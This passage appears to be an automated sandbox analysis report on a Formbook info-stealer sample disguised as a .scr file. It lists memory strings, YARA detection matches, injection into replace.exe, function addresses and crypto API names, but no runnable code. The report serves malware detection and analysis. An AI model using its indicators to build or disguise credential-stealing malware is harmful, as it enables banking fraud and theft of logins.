                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033O
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: replace.exe, 00000006.00000003.2153903336.0000000007F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backup
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendas
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominio
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resell
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=ssl
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominios

                  E-Banking Fraud

                  Source: Yara match; File source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  Source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015038E03_2_015038E0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BFB763_2_015BFB76
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01575BF03_2_01575BF0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153DBF93_2_0153DBF9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151FB803_2_0151FB80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BFA493_2_015BFA49
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B7A463_2_015B7A46
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01573A6C3_2_01573A6C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015ADAC63_2_015ADAC6
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01545AA03_2_01545AA0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159DAAC3_2_0159DAAC
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A1AA33_2_015A1AA3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B1D5A3_2_015B1D5A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01503D403_2_01503D40
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B7D733_2_015B7D73
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151FDC03_2_0151FDC0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01579C323_2_01579C32
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BFCF23_2_015BFCF2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BFF093_2_015BFF09
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014C3FD53_2_014C3FD5
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014C3FD23_2_014C3FD2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01501F923_2_01501F92
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BFFB13_2_015BFFB1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01509EB03_2_01509EB0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DA3526_2_034DA352
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034E03E66_2_034E03E6
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0342E3F06_2_0342E3F0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C02746_2_034C0274
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034A02C06_2_034A02C0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034A81586_2_034A8158
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034101006_2_03410100
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034BA1186_2_034BA118
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D81CC6_2_034D81CC
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034E01AA6_2_034E01AA
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D41A26_2_034D41A2
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034B20006_2_034B2000
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034447506_2_03444750
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034207706_2_03420770
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0341C7C06_2_0341C7C0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343C6E06_2_0343C6E0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034205356_2_03420535
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034E05916_2_034E0591
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D24466_2_034D2446
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C44206_2_034C4420
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034CE4F66_2_034CE4F6
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DAB406_2_034DAB40
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D6BD76_2_034D6BD7
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0341EA806_2_0341EA80
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034369626_2_03436962
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034229A06_2_034229A0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034EA9A66_2_034EA9A6
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034228406_2_03422840
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0342A8406_2_0342A840
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0344E8F06_2_0344E8F0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034068B86_2_034068B8
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03494F406_2_03494F40
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03462F286_2_03462F28
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03440F306_2_03440F30
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C2F306_2_034C2F30
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03412FC86_2_03412FC8
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0349EFA06_2_0349EFA0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03420E596_2_03420E59
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DEE266_2_034DEE26
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DEEDB6_2_034DEEDB
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03432E906_2_03432E90
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DCE936_2_034DCE93
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0342AD006_2_0342AD00
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034BCD1F6_2_034BCD1F
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0341ADE06_2_0341ADE0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03438DBF6_2_03438DBF
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03420C006_2_03420C00
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03410CF26_2_03410CF2
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C0CB56_2_034C0CB5
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0340D34C6_2_0340D34C
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D132D6_2_034D132D
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0346739A6_2_0346739A
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343B2C06_2_0343B2C0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C12ED6_2_034C12ED
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343D2F06_2_0343D2F0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034252A06_2_034252A0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034EB16B6_2_034EB16B
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0345516C6_2_0345516C
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0340F1726_2_0340F172
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0342B1B06_2_0342B1B0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034CF0CC6_2_034CF0CC
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034270C06_2_034270C0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D70E96_2_034D70E9
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DF0E06_2_034DF0E0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DF7B06_2_034DF7B0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034656306_2_03465630
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D16CC6_2_034D16CC
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D75716_2_034D7571
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034E95C36_2_034E95C3
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034BD5B06_2_034BD5B0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034114606_2_03411460
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DF43F6_2_034DF43F
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DFB766_2_034DFB76
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03495BF06_2_03495BF0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0345DBF96_2_0345DBF9
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343FB806_2_0343FB80
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DFA496_2_034DFA49
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D7A466_2_034D7A46
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03493A6C6_2_03493A6C
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034CDAC66_2_034CDAC6
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03465AA06_2_03465AA0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034BDAAC6_2_034BDAAC
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C1AA36_2_034C1AA3
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034299506_2_03429950
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343B9506_2_0343B950
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034B59106_2_034B5910
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0348D8006_2_0348D800
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034238E06_2_034238E0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DFF096_2_034DFF09
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03421F926_2_03421F92
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_033E3FD56_2_033E3FD5
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_033E3FD26_2_033E3FD2
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DFFB16_2_034DFFB1
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03429EB06_2_03429EB0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03423D406_2_03423D40
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D1D5A6_2_034D1D5A
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D7D736_2_034D7D73
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343FDC06_2_0343FDC0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03499C326_2_03499C32
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DFCF26_2_034DFCF2
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C116D06_2_02C116D0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C2A1E06_2_02C2A1E0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C0CAB06_2_02C0CAB0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C0AB306_2_02C0AB30
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C0C8876_2_02C0C887
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C0C8906_2_02C0C890
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C1322B6_2_02C1322B
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C132306_2_02C13230
                  Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0348EA12 appears 86 times
                  Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0340B970 appears 262 times
                  Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 03455130 appears 58 times
                  Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0349F290 appears 103 times
                  Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 03467E54 appears 107 times
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: String function: 0157F290 appears 103 times
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: String function: 014EB970 appears 262 times
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: String function: 01535130 appears 58 times
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: String function: 0156EA12 appears 86 times
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: String function: 01547E54 appears 101 times
                  Source: MR-239-1599-A.scr.exe Static PE information: invalid certificate
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1652259895.0000000003D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dllD vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1655127195.0000000007A10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1651899586.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1651258353.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1654654834.00000000074B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dllD vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.000000000107A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameREPLACE.EXEj% vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000003.00000002.1946410833.00000000015ED000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.0000000001067000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameREPLACE.EXEj% vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe Binary or memory string: OriginalFilenamePIqH.exe& vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: MR-239-1599-A.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.MR-239-1599-A.scr.exe.74b0000.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.MR-239-1599-A.scr.exe.74b0000.4.raw.unpack, -.cs Cryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.MR-239-1599-A.scr.exe.74b0000.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.MR-239-1599-A.scr.exe.3d49970.1.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.MR-239-1599-A.scr.exe.3d49970.1.raw.unpack, -.cs Cryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.MR-239-1599-A.scr.exe.3d49970.1.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, FF8AN7cloefg4PRKmr.cs Security API names: _0020.SetAccessControl
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, FF8AN7cloefg4PRKmr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, FF8AN7cloefg4PRKmr.cs Security API names: _0020.AddAccessRule
